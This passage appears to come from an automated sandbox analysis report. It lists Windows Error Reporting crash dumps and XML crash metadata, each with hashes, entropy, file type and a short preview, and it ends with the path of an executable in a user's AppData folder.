                                                SHA-512:4FBF1C697713AD07C636B960310756539EC304015A82F79FB06A693183D92AE2BB6FFFF78EBC9BF5E07301C70A00A6B3134EA590758BF9C82A28CCC34A29C157
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:50 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):28262
                                                Entropy (8bit):2.7107925736269802
                                                Encrypted:false
                                                SSDEEP:192:vdSjfFUXwX8PLZsQOKgTXp+u7c1/N2MMsHokpXzoore+hQ9veMNqHMWV:8b6PLaXXhiV2MM+HeF5erMq
                                                MD5:F9E59DB9C89384FD04D3AAEEFA26DA97
                                                SHA1:C3B76B754A34984C9542823EE53653F8FBBE8BB6
                                                SHA-256:F5CDA61AECF6BC09804B13BD941CE5E1573DF0007429FB082269AF18541390C9
                                                SHA-512:8433E1FD6D62F3427118A937441159C26D1BB4DDCB287E1426F3E7A8B2C0CB7830199EAF261B5EAF0F48CBCFF58EEFB23CAB5498D84E10ABF13CB7E77C60908D
                                                Malicious:false
                                                Preview (binary minidump; non-printable bytes omitted):MDMP header, then the printable strings GenuineIntel, Eastern Standard Time, Eastern Summer Time and the OS build string 19041.1.amd64fre.vb_release.191206-1406 (the last three UTF-16 encoded), followed by a long run of non-printable bytes
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8306
                                                Entropy (8bit):3.6910649212749753
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLI6EyJ6Y2DiSU9QkHwgmft86WpDi89bVnsfZnm:R6lXJU6/6YvSU9QkQgmftqVsf0
                                                MD5:87874EFC7386AE7FB619C756552E011B
                                                SHA1:DE8ECBEF53EEC741CA5BEC5F73690500AFA697BF
                                                SHA-256:2880E7793A23E1872F7EB7056CCB13E1645D8E67DFAD56F8D8ADFE9CB899EEAA
                                                SHA-512:08A8D93841878DBBC2DB7F775EF6818E894B55AD47609EDF1C12FF67A33480340B7498A5FF2FC8FB0CC9F6C49415BC34FB1CF9BE61DE5C5A0B1C38C9B4B2A6C4
                                                Malicious:false
                                                Preview (UTF-16LE text with BOM, decoded; CRLF and tab indentation collapsed to single spaces):<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4196</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:50 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):67656
                                                Entropy (8bit):2.1351800656082194
                                                Encrypted:false
                                                SSDEEP:384:yiG0ZdbtgncxWjRbp++j2Mh0oc4krtUKo:PpHbtgnzN3j2MqrtUK
                                                MD5:AAA6601E8E583893D0D602A3664CDB69
                                                SHA1:40F62966A8FC40C1D1CFD3B2E34FB5A81723A1DA
                                                SHA-256:4844086A5FC11E77EF7F6773AE5304BB9AC3101325FAB4D7196449C628224E07
                                                SHA-512:C7A2475CBD8219701D0F37D216A722E53623225261D4DA59070172C57D2DBA485CEBE4F17ED454E42DC96F7301C527495CC662BE478FF1BA73EE1DFEECC48517
                                                Malicious:false
                                                Preview (binary minidump; non-printable bytes omitted):MDMP header, then the printable strings GenuineIntel, Eastern Standard Time, Eastern Summer Time and the OS build string 19041.1.amd64fre.vb_release.191206-1406 (the last three UTF-16 encoded), followed by a long run of non-printable bytes
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4579
                                                Entropy (8bit):4.439318769261094
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYIPYm8M4JSGFv+q8U28RqFd:uIjfxI70g7VkJL48RqFd
                                                MD5:7444D6B99CDBCE523120AED125E3CB64
                                                SHA1:987F1BC28927B1AEE9C76DF3E8403BC223BF9F64
                                                SHA-256:741EA4DD1738E81755BB47F49297A037E1D24455B79E4A3BD88EE631E0039BB2
                                                SHA-512:B9EC0C6A1CD16FE20199707816BF447C58E99757D626F40C3EE144B5D4D559E205E7369D024DE9E15375DFB3FB7DE47681E92FB417CE3B27F1E056AE45313970
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8396
                                                Entropy (8bit):3.696380059066445
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ2E66s86Yrpu46ARqgmfKaWpB089bVLqsfNfnm:R6lXJl66s86Yrn6ARqgmfKTVLJfNO
                                                MD5:613E7BA596EDB3419AE83DBE2537EB63
                                                SHA1:79BCB5BAB9A014F9CF19F1C9060B482FF2B24CDC
                                                SHA-256:436760E8438696E9A9F36CF923011003A6F9B8DD25895D7C1B170D8EBD71BE81
                                                SHA-512:D0701EA35F3804AC5277AE3ED1BBA6D60519BEF6F9B15D1C39E12D65A0894542D7C92E5EC3BDB44F49E5BF61B6ABB2A9E2FED3D9AAE68218DAA4B6D0D07A494A
                                                Malicious:false
                                                Preview (UTF-16LE text with BOM, decoded; CRLF and tab indentation collapsed to single spaces):<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>1512</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.467885070991706
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYrEYm8M4JStFSe+q8vzk38Rqhd:uIjfxI70g7VAxJfeKw38Rqhd
                                                MD5:716EAAAAABB677ED52ED9A732BC10E8E
                                                SHA1:47E28B7454A6503EE1BE8D95068DFAEC0F39D954
                                                SHA-256:968326C5D49EAC419311A0FD9B4B29F744CCA67607E7675837E75F7DAFA64D57
                                                SHA-512:22FAE5F6A2F48818E891E4773A27892E6D2F79B83B4BCFB4C4397891D23072FAE3EDEF93171AF5A6835EC30751C82313DA2305628919A8C4BEA2313670D3075B
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:51 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):66928
                                                Entropy (8bit):2.1578375535411753
                                                Encrypted:false
                                                SSDEEP:192:unF2c7XYbXQZdw8n4KQOmgtgQ3W7ccg+ZxjLmLznXSFPTDo1pN2Mh1HokpSotp1E:N0ZdNvntgQZ2xWf++j2Mh0ucg+nD
                                                MD5:D24060EF7714270F46E40A7C102BFF03
                                                SHA1:8E4A6695ACCCD87AF4F94B46B0D9AEE171AD4F43
                                                SHA-256:C847D8A5C73D087FE11B454941EAD27AA93CB02BBC884CDD4AB1CBC0F6D5041C
                                                SHA-512:E936E6295399C0EAF65782DE6A66A7076DF591D6B983C56F8CDECF1F7A4822461139EF169D456B11173ADA8C7154E899A4D4FF43FAA71F6B931171AD06210AD1
                                                Malicious:false
                                                Preview (binary minidump; non-printable bytes omitted):MDMP header, then the printable strings GenuineIntel, Eastern Standard Time, Eastern Summer Time and the OS build string 19041.1.amd64fre.vb_release.191206-1406 (the last three UTF-16 encoded), followed by a long run of non-printable bytes
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6392
                                                Entropy (8bit):3.720239905491603
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ2g6mJNYKaWpBy89bMLqsfo8km:R6lXJR6mJNYKJMLJfN
                                                MD5:6B3D41908A3A05385CAD9F2727834359
                                                SHA1:82F60602B8036370BDCA53CB6566E302538301F4
                                                SHA-256:E3DB791C44F4FABE844DCEB6E28716051D93A6BF0FA9D766DB87F10A165BD162
                                                SHA-512:96420E464911F65E8169A10092D5211425DA01B163A86145384ACBFB72C72D9F8262C9ABB2FDEEBBDC6812DF43F60CBFEDADCAEAD183BE0AD5A5DA990D5CA67D
                                                Malicious:false
                                                Preview (UTF-16LE text with BOM, decoded; CRLF and tab indentation collapsed to single spaces):<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>1512</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.4687041049551235
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VY6mYm8M4JStFB+q8vzk38Rqhd:uIjfxI70g7VhJOKw38Rqhd
                                                MD5:E8FF3935104B1C8326A8D13891BE1F26
                                                SHA1:6BCFC15DA61CA01893C9C4CCD0E293EF1CC579C7
                                                SHA-256:4C6260F00B630E61A9392E2FFA03E47EC0CB81CD4B42FF14DE3220483EBC52B6
                                                SHA-512:68ACE87AF8BCFC2AE6FA8D1A4F918D9236F764A932558D074A29ADF21530C13B1EBC5EFDB1D89CACAAA0472E30917AE8BAD38F38BA366F5125968775F3EA5D6F
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:53 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):72620
                                                Entropy (8bit):2.0899037979926294
                                                Encrypted:false
                                                SSDEEP:192:UYuUBEX0XARNNy4kjOmgtgi3W7Ufa2rIxjLNLibgnXSiTDo1pN2Mh1HokpSotp1t:F+RNZZtgiJffsx99F+j2Mh0C9Ag1
                                                MD5:4D6DE88A86B26396681DF005FBC08F28
                                                SHA1:F25F1ED65085AB447AF29749A69F2A6965A08E4D
                                                SHA-256:B7BF24725C91A422101196B836078D52646F35D58FB4336FB0BDA59F4C1EF246
                                                SHA-512:90DF7145B60F7E414CFD36FBC25B11D2D5F50EA8D4EAE058B0B8AF4E008B2DF19C25DE4E917DD38EB672ED56DC1F21BDDE6A444D81A510ECCE3D9C2F595DE39A
                                                Malicious:false
                                                Preview (binary minidump; non-printable bytes omitted):MDMP header, then the printable strings GenuineIntel, Eastern Standard Time, Eastern Summer Time and the OS build string 19041.1.amd64fre.vb_release.191206-1406 (the last three UTF-16 encoded), followed by a long run of non-printable bytes
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6392
                                                Entropy (8bit):3.718800974940306
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ256wNJwtYaaAjArWpBT89b+LqsfCKm:R6lXJY6wNqtYaaAjAB+LJfm
                                                MD5:31A1FECFDEBA5CF5571A0D8960C620F8
                                                SHA1:182D7292FF4A847DD296FCC2F3A675B835F52D93
                                                SHA-256:5068F23D4BA6CD3C35655564AAD623EE60C94216DF78CE264A4858651F7A84CB
                                                SHA-512:1C46F3F5BE8139FEFEABFD0AA02201FE8C9FD64C86D4C61C21C8C3F59FBAAA8F1C7625CDC0DD150C4D0CB6F8E0DE4C987FC763E976AD64DFB2037FD9C354A415
                                                Malicious:false
                                                Preview (UTF-16LE text with BOM, decoded; CRLF and tab indentation collapsed to single spaces):<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>1512</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.465384372208263
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VY9Ym8M4JSFFv+q8vzM38Rqhd:uIjfxI70g7VVJYKI38Rqhd
                                                MD5:0E8570DED1869A5AB0CC995D5F7909E9
                                                SHA1:25634D8512420730BC485C7301B1CC75F059A4A4
                                                SHA-256:A76359A013A9E4AC6B36CE07458F7E980575E19445E6EC9679D7AA3B4252EA21
                                                SHA-512:772577D71892D63DFD9FC8EAE80C67B2A17C1D2DBAEB7560B08AEF87AB096AB5C1724D0C13402EE1ADCF08D524F0B6B12839A75BEF1D93AFA0A7A788CCB5E163
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:54 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):67026
                                                Entropy (8bit):2.157780821270462
                                                Encrypted:false
                                                SSDEEP:192:78F2c7XYbXQZd5QOmgtgOK3WExjLNLWnVynTadhnXSiTDo1pN2Mh1HokpSotp1W0:90ZddtgOKHx9HoF+j2Mh0uCga/snD
                                                MD5:B3622070103458266AC71D090EE5A53A
                                                SHA1:C0FE37F01641DCF4E0E2BACFFFC714C93176B88A
                                                SHA-256:12F8FBB745007A388BF5D5A47E58F1A261045AA5A51F96EC81064ECB3C896FD4
                                                SHA-512:3D8355C68C38E40E89D015D69E3D0275BD6AA6D1294D6A851D2B0F6F0D291909A9A4ACA0ACD9D78E3330DE0B0763D639FC0B866996D73F849BA299326845EF26
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g............$...............,............4..........T.......8...........T.......................................................................................................................eJ......l.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6392
                                                Entropy (8bit):3.718198413214661
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ2k6lNHcYKaWpBw89bxLqsfabm:R6lXJV6lNHcYKPxLJfv
                                                MD5:D31EBD5E741BEFCB9214DC782731BE28
                                                SHA1:49B36B8ED0CC7A553C7769EF1D991AF03640BF5C
                                                SHA-256:F37524A05B45BBA8E3AE670E942C079DDAB908201B46CC054DA435D1D4DDBCCA
                                                SHA-512:9B01F610B354130F67969FF939A6317CA6B3A2C19B5B291A2676344F4975493A9F71BA99C4BF7A6BA0B03E424CCFAADB56BD563FA7415CD7678AA400D9FF25AB
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.1.2.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.469467794250785
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYbYm8M4JStF/+q8vzk38Rqhd:uIjfxI70g7V/JoKw38Rqhd
                                                MD5:C4B4D402E35C21D995229EEDB29CDA54
                                                SHA1:55762E2A8957AE501DF952A5DF4194C308BB2ADC
                                                SHA-256:B37F1B2DAC7D6CCECC22B2477AFF6D81DD98D9ADE8347666C53493EF6388C19F
                                                SHA-512:EF2062AF4AD3C9D032C129547B1857DCDD55FA9432D1101EAA1CC2D39ED0927EC7BFD1562EDF4FE8BBA28821888F52DD5F77A4FF52D88DDD5740ACB4DBAC1CDA
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:55 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):87020
                                                Entropy (8bit):2.198018791753391
                                                Encrypted:false
                                                SSDEEP:384:M+rTbFxtgI2JdiQSJXj51QdoL3bVIZj2Mh0/t+vMFJIeI:M+rfPtgI2JdeJN1+oLLij2Mq1+cu
                                                MD5:150FD88B1D9C1C43129485688A83143D
                                                SHA1:FF2E35CC3CF9129018BBD30559A4CC46D2F606FE
                                                SHA-256:CF13CCCE1F9DBF7D367B565FEBCF641C4CBD7A1EA0E61402FB3AE3F4D568275F
                                                SHA-512:0337C8196AE1CFBAA16DB784CECFA7B27F76051054A1EEE7917E7668C1BA54D10B34EB504BD4E7478E150CA14BDDDBF3626052EE303CCCA7C8B38D5060A27BF7
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g........................................d=..........T.......8...........T...........x$..t/..........d...........P...............................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6392
                                                Entropy (8bit):3.720906822864488
                                                Encrypted:false
                                                SSDEEP:96:RSIU6o7wVetb2CA6Hcs9NYonpFX0Ykbu5aMOUT89bjLqsfeBm:R6l7wVeJ2968s3YKaWpBT89bjLqsfeBm
                                                MD5:44D8CE403297E341E337839B03A36B9A
                                                SHA1:4AFD99E83CDBAF458B2215C8B5A4569E6AEDD584
                                                SHA-256:A30823B85AE0D6E80C33FDFB7601577EC998D550268A218FCB27D8D100911AC8
                                                SHA-512:1FE16640A3CE5EA7AF92394462CD3892FEB81C6DC8E45BF8B67C981F95B8F2C3FB98F8D64CD1AD85F806FD7746237CF1BDDF6C775B04D36FD786A3EAF0104214
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.1.2.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.466408546097961
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYhYm8M4JStFXsC+q8vzk38Rqhd:uIjfxI70g7VFJAKw38Rqhd
                                                MD5:31DD061AC706E5A5BF55E88DB15AAC67
                                                SHA1:04528F89B63DC1B043F304A2B3B87AD16DF2BCCE
                                                SHA-256:6E8DCB613501AA6FCC90D091B2D3DB34FAA9D03CA6B74642819CF6601446C640
                                                SHA-512:00106CDB24ABAD3F3FC5DC2548CA3226D940EB08FE181C9123A8447ADB374154A46F20C38C3927823390CD1BB45CE194B0410E987F74CED96EFB7F8C799B5283
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Users\user\AppData\Roaming\xenor\yavascript.exe
